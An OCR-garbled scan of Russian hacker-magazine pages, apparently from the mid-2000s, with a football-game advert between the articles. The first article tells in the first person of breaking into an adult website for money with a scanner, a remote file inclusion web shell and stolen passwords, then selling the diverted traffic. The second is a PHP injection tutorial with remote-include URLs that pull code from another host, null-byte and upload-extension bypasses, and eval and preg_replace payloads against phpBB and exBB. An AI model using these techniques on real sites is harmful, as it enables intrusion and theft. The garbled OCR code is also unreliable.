никак не мог прийти в себя: тело ломило, суставы болели, словно 
их выкручивают трое китайцев, а в воспаленном мозгу проносились 
мысли о том, чего именно не следовало пить вчера и что же следует 
делать сегодня. От такого перенапряжения я решил собраться с си- 
лами и пойти на улицу, выпить пивка с друзьями. Ага, размечтался! 
Т ол ько полез я в карман проверить свое состояние, как крупно обло- 
мался и понял, что бабла у меня осталось ровно на мятный орбит. 
Нужно было что-то срочно придумать для заработка денег. И тут у 
меня в голове всплыла одна интересная мысль. Мой знакомый око- 
ло двух недель назад предложил мне одну сделку, но на тот момент 
никакого интереса она у меня не вызвала. Дело заключалось вот в 
чем: от меня требовалось лишь одно — взломать буржуйские сайты , 
чтобы с них заливать троянов или банально продавать этот трафик 
сторонним покупателям. 

Дело, конечно, грязноватое, да и законом тут не пахнет, но деваться 
мне было некуда. Денежная мания полностью охватила меня, и я на- 
чал свой длинный и опасный путь к счастью. 



ПОРНУШКУ ЗАКАЗЫВАЛИ? 

Первое, что мне нужно было сделать, — это определиться с жертвой. 
Выбор, конечно же, большой, но мне хотелось чего-то особенного. 
Я хотел найти сайт, который бы приносил хороший, стабильный до- 
ход. Ладно, поищем какой-нибудь порничок. Вбив в гугле «ХХХТЕЕЫЗ 
РОВІХІО», я получил доступ к нескольким сотням страниц с порноре- 
сурсами. Г лаза разбегались, я не знал с чего начать. Немного поиграв 
с гуглом, я остановился на одной ссылке — ѵѵѵѵѵѵ.іатіез-ааііегіез.сот . 
Прежде чем начать щупать сайт, я врубил ѴРІХІ . С подобными сервера- 
ми шутки плохи, ведь могут и голову пробить. Но сейчас не об этом. 
На сайте я увидел много разных фотографий, но они меня не инте- 
ресовали, мне нужно было найти изъян на этом сервере. Побегав по 
ссылкам, я понял, что движок написан на рйр. На сайте присутство- 
вало огромное количество скриптов, был также и форум — ѴЬиІІеІіп 
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.0.7, но это мне ни о чем не говорило. Нужно было смотреть все 
подробнее. Это, конечно же, довольно нудно, но стоит 
. На тот момент я решил отложить веб-атаку на некоторое вре- 
мя. Решил прощупать сервер глубже. Законнектившись на мой 
старенький рутовый шелл, я слил на него свежую ветку птар. Рас- 
паковал, заинсталлил и запустил сканирование: 

[гооШфгІІк птар-3.93]# птар ѵѵѵѵѵѵ.іатіез-даііегіез.сот -о -зЗ -V 

Нотутменя постигжестокий облом. Сканер нехотел выдавать вооб- 
ще никакой информации о сервисах: виной был файрвол, который 
стоял на сервере. И тут мне в голову пришла одна курьезная мысль. 
Не знаю почему, но мне вдруг захотелось протестить сервер на 
предметсді-уязвимостей. А кто мне в этом мог помочь? Конечно же, 
сді-сканер. Я решил написать свой собственный сканер. В голове 
уже сложилось представление о том, как он будет работать. Вот об 
этом и расскажу. 

У каждого сканера должна быть готовая базауязвимостей, которая 
может пополняться вручную или автоматически. Это, собственно, 
тот минимум, который должен иметь сканер. Теперь отом, как ведет 
себя сканер изнутри. Сначала он коннектится к атакуемому сай- 
ту. После, из заранее заготовленной базы, он берет уязвимость и 
подставляет к урлу сайта, дальше сервер отдает ответ 200ок. Это 
значит, что такая папка (файл) действительно крутится на серве- 
ре. Все. Так работает обыкновенный сканер. Примерно это мне и 
предстоит написать. Писать сканер долго не пришлось — через 
1 0 минут основной скелет был сделан, позже я окончательно допи- 
сал весь сорец, и большую часть времени, конечно же, потратил на 
отладку. Итак, вот что примерно у меня получилось. В этом сканере 
нет ничего особенного. Впопыхах я даже не добавил Іогк, ведение 
логов и многопоточность. Но это я решил оставить на потом , так как 
этот сканер был вполне работоспособным. Полностью разобрав- 
шись со сканером, я решил для начала затестить его на подопыт- 
ной машинке. Я регнул левый сайт на М5.ш . дождался ответного 
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СКАНЕР 

#!/изг/Ьіп/регІ 
изе ІО::5оскеІ; 
изе 8ІгісІ; 

ту ($Ьо$1пате, $Я1е, $рог() = @АВѲѴ 
$рогІ ог $роЦ = 80; 

$Ьоз(патѳ=~5/лнпр;\/ѵ//; 

$Ноз(пате=~з/Ѵ$//; 

ргН П “М ч , ’ <$ЯІѲ ' ) ° Г Йѳ ТІІе $,ІІе поНоипЙ!\п” 
рппі П Зсап зіагіей ($ЬозІпате:$ро«) \п”- 
ѵѵІііІе(ту $Ьид=<р^Е>) { ' ’ 

сботр$Ьид; 

$Ьид = 7”.$Ьид ипіезз ($Ьид =~ /лщ 



рпт “$Ііоз[пате$Ьид\п” іі зсап($Ьид); 



сІозе(РИЕ); 
рпт “[-] Зсап йпізбесІЛп”- 
зиЬзсап{ 
ту $з1п'пд=з№ 

^іг в - ю::з “ каяЕт -»~< р '«.>-.ср-. 

=> $Ьоз(пате, РеегРоп => $ р0 г( у 

ипіезз ($гетоІе) { ргіпі: “сап'І соппесІѴі”- ехіі 0- ) 

$гето(е->аиіоЯизЬ(і); 

ту $НПр = дрІНЕАО $зІгіпд НТТР/1 . і 



НОЗТ: ЗИозІпате 
); 

ргіт$гетоіе$ІіПр; 
ѵѵІпіІе(<$гетоі:е>) { 
геіигп “ок”і1 : (/НТТР.+?200\зОК/) 
оггеЩгпипс Іеі; 



письмаотхостерас моим логином и пассом отйр. После специаль- 
но создал на сервере папку с файлом раззѵѵогб/разз.іхі. Эту диру 
кинул в файл с багами и запустил сканер. Через 5 — 7 минут сканер 
успешно «ударил» меня найденной директорией и файлом разз.М, 
а это значит, что сканер работает нормально! Теперь я заготовил 
огромную базу уязвимостей и начал тестировать мой скрипт. Опции 
сканера были следующие: 



ссылку, подставив вместо «Іееп» многообещающее «Іезі». На что 
сервер ответил: 

ѴѴагпіпд: таіп(): РаіІесІ орепіпдд ІѳзГ.зІіІтГ Тог іпсіизіоп... 

Ха, перед нами банальный инклуд. Но не нужно радоваться раньше 
времени. Я слил на свой сайт наипростейший скрипт следующего 
содержания: 



-> регі зсгірірі Нозі Ьидз.М 80 



<?зузІет($стб); ?> 




НІІШ 



'^тгиуні охалв 






ш 



Думаю, в них даже ребенок разберется. Натравив сканер на сайт, 
я пошел спать. Проснулся в три ночи от безбашенных соседей, ко- 
торые врубили на всю мощь «Дискотеку аварию». Такого ора я не 
выдержал и решил больше не спать. Выпив кружку кофе, я пошел 
посмотреть состояние моего сканера. Не буду говорить, что я очень 
удивился, когда увидел результат. Сканер нашел несколько левых 
директорий, которые после проверки не дали никакого результата. 
Также он выципил три очень подозрительных скрипта. Нет, ссылок- 
то там было море, но редирект на другие страницы или сайты осу- 
ществлялся с помощью скрипта. Основным из них был скрипт ре- 
директа на другие сайты. Такие скрипты используются на всех ТОР 
(ТИитЬпаіІ СаІІегу Розі). Он называется чаще СЭ, реже — Воіаіог. 
Скрипт этот был не самопальный, а купленный. Следовательно, ис- 
ходников в Сети было не найти, да и ошибки в таком скрипте искать 
было почти бесполезно. Поэтому копаться в нем я не решился. Вто- 
рой скрипт, расположенный на сайте — баііу.рбр, который показы- 
вал галереи картинок по дням. Перед моими глазами, в строке бра- 
узера, возникла ссылка: ѵѵѵѵѵѵ.іатіез-ааІІепез.сот/баіІѵ.рІір?баѵ=7 . 
Тут же к цифре была добавлена кавычка, и получившийся запрос 
был послан серверу, а он, в свою очередь, выплюнул мне ошибку: 

ѴѴагпіпд: таіп(): РаіІесІ орепіпд ‘ЦауОА’.зІіІппГ іог іпсіизіоп 
(іпсІисІе_раіИ=’.:/изг/ІосаІ/ІіЬ/рІпр’) 

іп/изг/Иоте/іатіебб/іаппіез-даІІегіез.сопп/сІаіІу.рІпроп Ііпе 215 

Ответ от сервера означал, что скрипт инклудил зітті-файлы, начи- 
нающиеся с «бауО», где вторая часть имени файла берется у пара- 
метра бау, который передается скрипу ОЕТ-запросом, то есть в дан- 
ной ситуации сделать ничего было нельзя. Но остался шанс, что в 
третьем скрипте окажется более полезная уязвимость. Т ак оно и вы- 
шло. После того как я проследовал по ссылке, содержащей назва- 
ние нашего скрипта, линк выглядел так: ѵѵѵѵѵѵ.іатіез-ааііепез.сот/ 
са1еаогѵ.рІпр?са1=1ееп . Перед глазами появились девочки 1 8 — 1 9 
лет. Но нам сейчас не до них :). Я решил 
видоизменить 



Помни 



После этого я немного видоизменил ссылку, и теперь она выгляде- 
ла примерно так: ѵѵѵѵѵѵ.іатіез-ааІІегіез.сот/са1еаогѵ.рІір?са1=тір:// 
зегѵег.сот/стб&стсЫсІ . 

Удар по энтеру и ожидание... Через некоторое время скрипт отве- 
тил, что у меня права пользователя побосіу, что означало только 
одно — теперь мы можем выполнять команды на сервере, что само 
по себе уже хорошо. 

КОПАТЬ - НЕ ПЕРЕКОПАТЬ 

Теперь мне предстояло копаться в логах, хистори и прочей ерунде. 
Я просмотрел все возможные логи, которые были на сервере, ис- 
ключая логи апача. Веб-админка, с помощью которой администра- 
тор админил базу данных, получала пароль методом РОЗТ, поэтому 
не было смысла смотреть логи апача, тем более что этот пароль все 
равно находился в базе данных. Закачав на сервер ВЗТ МуЗОІ_ в 
одну из директорий, доступных для записи, я залез в базу на серве- 
ре, пароль и логин к которой были аккуратно выложены в конфиге 
админки. Но, к большому сожалению, данные из базы на главную 
страницу не выводились. Тогда я собрал все найденные пароли в 
текстовый файл, аименно: пароль отбазыданныхи несколько паро- 
лей от админки. После чего с удаленного сервера, используя збекк- 
доступ, я проверил, подойдет ли один из паролей к учетной записи 
Іатіе55 — никакой из паролей не подошел к данной учетке. Я решил 
отложить данный взлом на неопределенное время. 

ТНЕ ЕЫО 

Прошло целых две недели, как я не притрагивался к сайту ѵѵѵѵѵѵ. 
Іатіез-ааІІегіез.сот . Но вдруг я решил зайти на него и покопаться 
еще немного. Когдая зашел на веб-шелл, моему удивлению не было 
предела: администратор поставил дополнительную админку для 
редактирования некоторых страниц, и главная страница 
сайта была доступна для редактирования пользова- 
телю поЬобу. С этого момента я почти неделю 
сливал порнушный трафик, на чем было 
заработано больше двухсот зеленых ено- 
тиков. Спустя неделю админ заткнул багу 
в скрипте, убил все мои веб-шелы и все, 
что могло как-то напомнить о моем при- 
сутствии на сервере. 

Надеюсь, ты понял мораль данной ста- 
тьи. Конечно, нельзя ломать чужие сай- 
ты, однако если начал проводить нехо- 
рошее дело, то не торопись. Как видишь, 
изначально взлом ничего мне не дал, но в 
итоге я получил доступ к ресурсу.^: 
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"ФУТБОЛЬНЫЙ МЕНЕДЖЕР"! 

СОЗДАЙ СВОЮ КОМАНДУ ИЗ РЕАЛЬНЫХ ИГРОКОВ И ПРИВЕДИ ЕЕ К ПОБЕДЕ 



ТЫ ПОЛУЧАЕШЬ $135 МИЛЛИОНОВ 

на приобретение игроков российской премьер-лиги при 
регистрации на сайте \л/\л/\л/.іоіаІ-1 : ооіЬаІІ.ги. 

Подробности на сайте ѵгѵплг.ІоІаІ-іоаІЬаІІ.пі 



ГЛАВНЫЙ ПРИЗ - 
ПОЕЗДКА НА ФИНАЛ ЛИГИ 
ЧЕМПИОНОВ 2006/07 



Стартовал Футбольный менеджер посвященный Чемпионату мира 2006 
Призы от компании асіісіаз. Подробности на асІісІаз.ІоіаІ-іооІЬаІ.ги 





Всѳ скрипты, которые были 
использованы или упомянуты в ста- 
тье, ты найдешь на нашем диске. 




ш ■ 



Все тонкости 
внедрения кода 
в РНР-скрипты 



^РНРепеІгаІіоп 



ПРОШЛО УЖЕ МНОГО ВРЕМЕНИ С ТЕХ 
ПОР, КАКМЫ СТОБОЙ НАЧАЛ И ИЗУЧАТЬ 
РНР-ІГЦЕСТЮИ АТАКИ. ТЫ ЧИТАЛ СТА- 
ТЬИ В ЖУРНАЛЕ, ИСКАЛ ПРИ ПОМОЩИ 
ГУГЛА ВАЖНЫЕ САЙТЪ I И ПРОВОДИЛ ОБРА- 
ЗОВАТЕЛЬНЫЕ ПРОГРАММЫ ПО ИНФОРМА- 
ЦИОННОЙ БЕЗОПАСНОСТИ :). ОДНАКО ВСЕ 
НАШИ ДЕЙСТВИЯ ОСТАЛИСЬ БЕЗРЕ- 
ЗУЛЬТАТНЫМИ: ДО СИХ ПОР УЯЗВИМА 
ЦЕЛАЯ КУЧА РЕСУРСОВ! ПРОСТО ДЛЯ 
ИСПОЛЬЗОВАНИЯ ЭТИХ БАГОВ НУЖ- 
НЫ ДОПОЛНИТЕЛЬНЫЕ СВЕДЕНИЯ, О 
КОТОРЫХ ТЫ ЕЩЕ МАЛО ЧТО ЗНАЕШЬ. 
ПРИШЛО ВРЕМЯ ЗАПОЛНИТЬ ЭТОТ 
ПРОБЕЛ! 

ДАЖЕ У ТАКИХ КРУТЫХ ХАКЕРОВ, КАК 
ТЫ, БЫВАЮТ ОСЕЧКИ: КАЗАЛОСЬ БЫ, 
НАШЕЛ ВАЖНЫЙ СКРИПТ, МЕНЯЕШЬ 
ЕГО ПАРАМЕТРЫ, ЧИТАЕШЬ ОШИБКИ, А 
ПОЛОМАТЬ СИСТЕМУ НИКАК НЕ УДАЕТ- 
СЯ. ЧТОБЫТАКОЙ ПРОБЛЕМЫ НЕ БЫЛО, 
2АЭОХЫК НАПИСАЛ ЭТУ СТАТЬЮ. 



Классика 

Самая распространенная ошибка заключается в подстановке вне- 
шней переменной безо всяких проверок, сразу в оператор іпсіибе. 
Обычно это делают при создании модульной системы, каждый мо- 
дуль которой — рНр-скрипт, который инкпудится при определен- 
ных условиях. Вот посмотри на этот пример: 



$итоІ4апіе=”таіп.рІпр”; 

Т(@$_ОЕТ[‘ісГ]) 

іпсІисІе($_(ЗЕТ[‘ісГ]); 

еізе 

іпс!ис!е($итоІсІпапіе); 



При подключении модулей ІІВІ_ выглядит следующим образом: 
іпбех.рбр?ісІ=тосІиІе.рНр. Довольно часто, если этого не запреща- 
ет конфигурация РНР, ты можешь вставить в тело скрипта свой код 
таким образом: Щір://зі1е.ги/іпбех.рИр?іб=ИДр://о1Ііегзі1е.ги/апѵІіІе. 
Ш. где содержимое апуіііе.іхі — это код твоего РНР-скрипта. 
Обойти эту уязвимость можно многими путями. Ты только посмот- 
ри: 

$ех=”.рПр”; 

$итоІ4апіе=”таіп”.$ехр; 

Т(@$_ОЕТ[‘ісГ]) 

іпсІисІе($_ОЕТ[‘ісГ].$ехр); 

еізе 

іпс!ис!е($итоІсІпапіе); 



Модуль в виде файла ІоІ.рНр в данном случае подключается так: 
НДр://зіІе.ги/іпсІех.рІпр?ісІ=ІоІ . Припиши к своему файлу апуТМе на 
оіНегзіІе.ги расширение .рИр. Теперь инъекция будет выглядеть 
точно так же: ИДр://зі1е.ги/іпбех.рІір?іб=ІіДр://о1Ітегзі1е.ги/апѵІіІе. 
Действительно, ведь скрипт сам прикрутит расширение рНр. Это 
были самые элементарные атаки РНР-іпіесІіоп. Далее я покажу 
тебе материал поинтереснее. 










Листинг файлов и директорий 
через ріпр-инъекцию 
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Почти история 

В конце этого абзаца ты сможешь понять, почему у него такое на- 
звание. Вспомни ужасную функцию ІіІе_ехізіз. Да, это та, которая 
проверяет существование файла. Она вернет РАІ_ЗЕ при обраще- 
нии к любому удаленному документу. То есть файл должен быть до- 
ступен через файловую систему сервера. Таким образом, можно 
исключить любую инъекцию удаленного фрагмента. 



$ех=”.рИр”; 

$итоІ4апіе=”таіп”.$ехр: 

Т(@$_ОЕТ[‘ісГ]) 



$ЛпаІ=$_ОЕТ[‘ісГ].$ехр; 

еізе 

$ЛпаІ=$итоІсІтапіе; 
ТДіІе_ехізІз($1 : іпаІ)) I 
іпс!исІе($ТпаІ); 



До конца ли безопасна такая конструкция? Нет, не всегда. Пред- 
ставь, что на сайте есть форум, и на него можно загружать свои 
файлы. Это могут быть аттачи к сообщениям, фоты или аватары. 
К любому из перечисленных агрегатов можно приклеить незамет- 
но для скрипта-аплоадера РНР-код. Таким образом, полученный 
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Админка ѳхВВ 











файл со зловредным кодом будет находиться на сервере, и одна 
обработка ІіІе_ехізІз здесь не спасет. Как ты понимаешь, если бы 
расширение не проверялось, и вся надежда была бы на эту функ- 
цию, инъекция бы удалась. 

Однако почти всегда у аватар расширения не выходят за границы 



списка діТ, ірд, Іред, рпд,ауаттачей — гір, гаг, бос. Новпеременной 
$ех, какправило,содержитсячто-товроде.рИрили.іпс.рІір.Таккак 
же быть, если зловредный код у тебя в файле аѵі 32. діТ, а расшире- 
ние, прикручиваемое внутри іпбех.рНр, неизвестно? В РНР есть та- 
кая вещь, кактадіс_дио!ез_дрс. Эта опция РНР разрешает слеши- 
рование (экранирование) всех входящих в запрос потенциально 
опасных символов. В их число входит апостроф, кавычка и другие. 
Вотсмотри: если ты пошлешь в куках или же в (ЗЕТ-, РОЗТ-запросах 
строку апІісИа1’з_зпіІІег, то скрипт ее получит как апІісба1:Ѵз_зпіІІег. 
Этот пасс иногда спасает криворуких программистов от взлома их 
скрипта. Однако опытным программистам эта функция доставляет 
большехлопот, чем помощи. Как раз поэтому-то еще остались хос- 
теры, которые не держат эту опцию включенной. Именно тадіс_ 
дио!ез_дрс, установленная на ОРР, позволит провести нам инъек- 
цию. К числу потенциально опасных символов относится нулевой 
байт: он обозначает конец строки. Слеширование нулевого байта 
обезоруживает его, символ теряет свое значение. Однако без 
тадіс_диоІез_дрс слешировать его вряд ли кто-нибудь захочет. 
Вот пример инъекции: 



глядит, что все обработалось корректно. Я думаю, ты тоже парень 
не промах! Ведь можно передать в саі что-то вроде «ИДрѴ/оіИегзіІе. 
ги» и положить на оіИегзіІе.ги самопальный скрипт. Еслинасервере 
включен гедіз!ег_дІоЬаІз (параметры из запроса соответствуют од- 
ноименным переменным в скрипте), то инъекция будет проведена 
успешно. В іпсіибе (и аналогах) удаленно инжектировать можно не 
только по ННр, но и по Йр. 

тогіаі иріоасі 

Вспомни разговор про загрузку аватар. Там мы загружали файл 
на форум или какой-то другой движок с функцией пользователь- 
ского аплоада. Отмечалось, что расширения файла ограничены, 
однако иногда это можно обойти. Хотя ошибка очень прозрачна, но 
она до сих пор часто встречается. Допустим, ты загружаешь файл. 
Неопытные программисты иногда пишут проверку расширений 
примерно воттак: 




ИНр://зіІе.ги/іпбех.рИр?ібЩогит/аѵаІагз/изег/с20аб4б76!е97759аа27а0с99Ьй 
671 0.діІ%00&с=[СОММАІѴЮ] 



іия 

! ■ 



); //Возможные расширения 
//Проверяем расширение 
$газЬ=ехрІобе(“.”,$_РИЕЗ[“изегНе”][‘пате’]); 
іфіп_аггау(зІгІоІоѵѵег($газІп[1]), $ехрз)) 
біе(‘у файла неверное расширение’); 



Здесь %00 — закодированный нулевой байт в формате ІІВІ_. Стро- 
ка, передаваемая функции іпсіибе, имеет вид: Іогит/аѵаіагз/изег/ 
аѵ132.діІ[І\ІІІІ_І_].рІір. Какя отмечал выше, нулевой байт «отрезает» 
правую часть строки. Таким образом, прикручиваемое расшире- 
ние не имеет значения, и ты можешь подставить в файл РНР фраг- 
мент из аватары аѵ132.діІ. Правда, сейчас большинство хостеров 
устанавливают тадіс_дио!ез_дрс на ОІМ, что защищает скрипты 
от трюка с нулевым символом. Но и на этот случай есть свои от- 
мычки. 



Ошибка здесь следующая. Скрипт проверяет не расширение 
файла, а ту часть имени файла, которая находится после первой 
точки слева до второй слева (если такая имеется). Обычно это и 
есть расширение файла, однако, если загружать файл с именем 
збеН.М.рбр, файл загрузится успешно, и сервер будет понимать 
загруженный файл как РНР-интерпретируемый (если не прописа- 
ны соответствующие установки в. Иіассезз). На самом деле, скрипт 
должен проверять самую последнюю из частей имени файла, полу- 
ченных разбивкой последнего по точкам. Другая версия парсера: 



еізеіі, или что еще можно сделать 

Помимо описанных выше действий, можно сотворить еще много 
всего, но каждый раз это зависит от конкретного примера. Допус- 
тим, у тебя есть такой фрагмент минимодульного движка: 



$ехрз=аггау( 
‘гаг’, 

Щр’ 

‘бос’ 



еггог_героіТіпд(0); 
$ех=”.рЬр”; {ф 



//$саі - папка с модулями 
$итоІ4апіе=”таіп; 
#папка с модулями# 



# 



іІ($_ѲЕТ[‘саГ]==ЧіІез’) $саІ=”ТМез”; щ 
еІзеі!($_ѲЕТ[‘саІ’]==’босз’) $саІ=”босз”; 
еізе есПо “Неверный раздел”; 
іГ(@$_ОЕТ[‘іб’]) 

$ЯпаІ=$_ѲЕТ[‘іб’ 
еізе $ИпаІ=$итоІсГіапіе; 
іТ(!егеді(“[\.’]”, $ИпаІ) && зІг_герІасе(сІпг(0),Т,$1 : іпаІ)==$1 : іпаІ) 
іпсІибе($саі.”/”.$1 : іпаІ.$ех): 
еізе Іпс1ибе(“еггог404”.$ех); 



Здесь не проверяется существование файла. Если в (ЗЕТ-запро- 
се значение параметра саі не удовлетворяет требуемым, ты, как 
не странно, получишь предупреждение о том, что раздел неве- 
рен. Однако дальнейшее исполнение скрипта будет продолжено. 
Ошибки автор скрыл через еггог_герог1іпд(0), поэтому внешне вы- 



1Я 



‘Іхі’ ■ 

); //Возможные расширения 
//Проверяем расширение 
$газГі=ехрІобе(“.",$_РіІІ,ЕЗ[“изебіІе”][‘пате’]); 
ІІ(соип1:($газГі)< 2)біе(‘у файла нет расширения’); 
і! : (!іп_аггау(зігіоІо\л/ег($газІп[соипі($газГі)-1]), $ехрз)) 
біе(‘у файла неверное расширение’); 



Однако, учитывая особенности сервера АрасИе (и других), можно 
утверждать, что данный вариант проверки также уязвим, и на мо- 
мент написания статьи уязвимости подвержено множество извес- 
тных и не очень РНР-движков. В чем фишка? Если апач не может 
определить расширения файла, то он смотрит следующую часть 
имени файла, отделенную точкой от расширения. Например, файл 
агИіѵе.рНр.ех в большинстве случаев будет интерпретирован как 
РНР-скрипт! 

В итоге единственным верным решением будет полная фильтрация 
имени файла на опасные расширения загружаемого файла. Для 
страховки также рекомендуется поместить в директорию с файла- 
ми .Иіассезз, с удалением/переопределением опасных расшире- 
ний. Например: ВетоѵеТуре .рНрЗ .рНр .рНітІ .рбр4 .рИр5 .сді .рі 
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Внедрение кода, расположенного на внешнем сервере, может быть произведено только при соответствующей конфигурации РНР. 



взлом 



Можно поступить и другим способом. Сохранять на сервере фай- 
лы под предопределенным именем (скажем, ІіІе<іпбех>ІіІе, где 
<іпсІех> — номер файла), а при закачке формировать специаль- 
ный НТТР-заголовок на основе данных об этом файле, предвари- 
тельно занесенных в какую-либо БД, обеспечивая передачу файла 
пользователю под подлинным именем. Можно даже хранить файлы 
в базе данных, например в Му50І_. 

еѵаі 

Еще одна «злая» функция — еѵаі. В РНР она интерпретирует пе- 
реданную ей строку как РНР-код. Без этой функции можно впол- 
не обойтись практически в любом РНР-приложении. Очень часто 
ее применяют для удобной смены іетріаі’ов — тем какого-нибудь 
движка. Хотя сделать то же самое можно и без еѵаі. С помощью вот 
такой строки был взломан один хацкерский ресурс, имя которого 
называть я не буду: 



ния открывающихся логических скобок в заменяемой подстроке. 
Чтобы поместить результат с номером п, в заменяющей строке ис- 
пользуется сочетание\\п или равносильное $п. Пример: 



$с=”аЬа”;$с=ргед_герІасе(“/([аЬ]+)/і”, “<Ь>$1</Ь>”, $с); 

Здесь переменная $с примет значение <Ь>аЬа</Ь>. Тебя, ко- 
нечно же, заинтересовал модификатор «е», используемый в 
ргед_герІасе. Он предполагает то, что перед тем, как заменить в 
исходной строке фрагменты, найденные регулярным выражением 
новой подстрокой (гераісетепі), он эту подстроку интерпретирует 
как РНР-код. Значит, если у нас с тобой есть строка $с=”ріпд”, то, 
прогнав вот такой вот РНР-сценарий: $с=ргед_герІасе(“/ л (.*)$/іе”, 
“ргіпІ(‘\\1’)”, $с), мы получим содержимое строки $с — «ріпд». На 
практике рассмотрим нашумевшую РНР-инъекцию в рбрВВ, в коде 
ѵіеѵѵіоріс.рИр. Давай поймем, в чем фишка этой инъекции. Итак, вот 
фрагмент кодаѵіеѵѵІоріс.рНр из рНрВВ версии 2.0.15: 



еѵаІ(“\$$гедізіег_роІІ_ѵагз[$і] = \””.1:гіт($НТТР_(ЗЕТ_ѴАРЗ[$гедіз1:ег_роІІ_ 
ѵагз[$і]]).”\”:”) | 



Передавая в (ЗЕТ’е параметр ісі в виде ісІ={${рІір_сосІе}}, я получил 
веб-шелл. Что означает ${рИр_собе}}, читай ниже. 

ргед_герІасе — зачем там /е? 

Функция ргед_герІасе заменяет подстроку (первый параметр), за- 
данную регулярным выражением, на строку (второй параметр), ко- 
торая также может быть задана регулярным выражением в данной 
строке (третий параметр). Еще существует необязательный 4-ый 
параметр, но он нас не интересует. 

Заменяемая подстрока имеет следующий формат: 



[разделитель][выражение][разделитель][модификаторы] 



Разделитель — это любой неалфавитный символ (чаще всего это 
«/» или«#»), выражение — шаблон заменяемого фрагмента, а 
модификаторы — своего рода указатели. Они указывают прави- 
ла, по которым обрабатывается регулярное выражение. Каждый 
модификатор записывается как буква. Например, модификатор і 
означает поиск без учета регистра. В заменяющей строке могут 
быть использованы «результаты поиска» в данной строке. В за- 
меняемой подстроке фрагменты результатов логически обозна- 
чаются взятием в скобки. Смотри: «/(.*)/і» означает поместить всю 
данную строку в результат №1. Номеруются результаты, начиная 
с первого номера, по порядку, слева направо, по ходу расположе- 




гетѵіеѵѵ.ріпр-гетоіе — файловый 
менеджер от рІір.зрЬ.ги 



$теззаде = зіг_герІасе(‘Ѵ”, зиЬзіг(@ргед_герІасе 
(‘#(\>(((?>([ л ><]+І(?В)))*)\<))#зѳ’, 
“@ргед_герІасе(‘#\Ь(“ . зІг_ге р I асе ( ‘\Ѵ , Щ 
\\\Ѵ, $ЫдЫідЬі_та1:сІп) . “)\Ь#і\ 

‘<зрап зІуІе=\”соІог:#” . $1Иете[‘1оп1со1огЗ’] . 



“\”><Ь>\\\\1 </Ьх/зрап>’, ‘\\0 
, V . $теззаде . 1, -1)); 



ЫдНІідИЦгіаІюІі — переменная, где лежат слова, которые следует 
подсветить. Пользователь задает $_(ЗЕТ[‘ЫдЫдН1:’], где пробелы 
разделяют различные слова. $ИідЫідИі_таІсИ — его потомок, где 
вместо пробелов используется I. Трудно разбирать такое длинное 
выражение. Поэтому просто посмотри: $ИідИІідИі_та1:сІі участвует 
в параметре геріасетепі функции ргед_герІасе, где в заменяемой 
подстроке участвует модификатор «е». Причем ЗЫдИІідНЦтаІсІз 
нигде не обрамляется в абсІзІазИез. Это означает, что ты преспо- 
койно можешь внедриться в тот РНР-сценарий, который выполнит- 
ся перед заменой подстроки, в строке $теззаде. 

Если пользователю задать ИідИІідИі как «‘.зуз1:ет(‘сІіг’).’», то резуль- 
татом действия скрипта будет: 




ргед_герІасе(‘#\Ь(‘.зузіет(‘сІіг’).’)\Ь#і’, ‘...’) 



ргед_герІасе ѵѵісШі /е апсі ѵѵісНІі N111.1. 

Условно можно считать, что неиспорченный тадіс_дио!ез_дрс или 
аббзіазбез ШІ_І_ отрезает правую часть строки . Для чего это может 
быть использовано? Оказывается, много для чего. Нужно только 
воображение. В частности, І\ІІІЦ_ можно применить при работе с 
ргед_герІасе. Если в заменяемой подстроке, определяемой регу- 
лярным выражением, всунута переменная, которую тем или иным 
способом определяет пользователь, можно попробовать изменить 
структуру заменяемой подстроки так, чтобы в конце стоял модифи- 
катор/е. Посмотри на простенький пример: 



ргед_герІасе(“#$с#і”, \ѴГ, $тсІа); 



Представь, что и $с и $тба можно как-то определить. Пусть в экс- 
перименте будет задано $тба и $с прямо через (ЗЕТ. 



зсгірі.рЬр?с=(зузІет\(Із\))%23е%00&тсІа=зузІет(Із) 



В результате получается листинг файл ового каталога. А почему это 
так — попробуй подумать сам, обо всем этом уже писалось в дан- 
ной статье. %23 — ІЛТІ_-закодированный символ #. 

Движки на файлах 

Некоторые бесплатные хостеры не предоставляют доступ к 
Му50І_. Для таких случаев пишутся движки на текстовых БД. Струк- 
тура и общение с текстовыми БД может быть самая разная. Иногда 
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разработчики даже придумывают библиотеки функций для рабо- 
ты с текстовыми БД с помощью некоего подобия языка ЗОБ. В та- 
ком случае текстовая БД представляет собой папки и файлы, где 
папки, например, — это базы данных, файлы — таблицы, а внутри 
файлов все как-то мудрено организовано в виде структуры табли- 
цы. Нас же будет интересовать другой подход к организации БД 
на файлах. Например, что может быть проще того, чтобы заносить 
все данные в некий РНР-файл , доступ к которому будет закрыт из- 
вне, с тем, чтобы потом его инклудить и получать массивы данных 
прямо в готовом виде. Рассмотрим уязвимость в ехВВ 1.9.1. Нам 
неважно то, как мы сможем получить доступ к админ-панели (это 
делается с помощью других, не РНР-іпі уязвимостей в движке), но 
главное, что такая возможность есть. Зайдем в админ-панель, в 
конфигурацию. 

Теперь поищем, где хранятся все эти данные. Оказывается, что они 
лежат как раз в таком инклудаемом файле (доступ к нему закрыт 
.йіассезз’ом). Файл имеет вид: 






$ехЬЬ[‘ЬоагсІиіТ] = Шр://ехЫэ’; 
$ехЬЬ[‘Ітоте_ра1:Іі’] = ‘хі/Іпоте/ехЬЬ/ѵѵѵѵѵѵ/’; 
$ехЬЬ[‘ЬоагсІпате’] = ‘название форума’; 
$ехЬЬ[‘ЬоагсІсІезс’] = ‘описание форума’; 
$ехЬЬ[‘аппоипсетеп1:5’] 
$ехЫэ[‘іорісз_рег_раде’] 



'Л* 

$ехЫэ[‘ро5І5_рег_раде’] = 10; 
$ехЬЬ[‘сН_ТПез’] = 0777; 
$ехЫэ[‘сІг_сІігз’] = 0777; 
$ехЫэ[‘ги_піскз’] = 1 
$ехЫэ[‘гед_зітрІе’] = 0; 
$ехЫэ[‘сІе1аиІ1_Іапд’] = ‘гиззіап’; 
$ехЬЬ[‘сІе1 : аиІі_зіуІе’] = ‘ОгідіпаГ; 
$ехЫэ[‘тетЬегдопе’] = 15; 



Я сумел выйти за кавычку только в одном из параметров. Это — 
$ехЫо[‘ЬоагсІиіТ]. В итоге я получил такой код: 



$ехЬЬ[‘ЬоагсІиіТ] = Шр://ехЬЬ’.@іпсІибе(Шр://1 27.0.0. ІДаІакіп.М’).” 



Если переменные хранят значения за двойными кавычками, то нам 
даже необязательно выходить за них, что было необходимо «с ‘». 
Во-первых, мы можем вывести себе любую переменную, просто 
прописав ее имя, а во-вторых, можем выполнить любую функцию, 
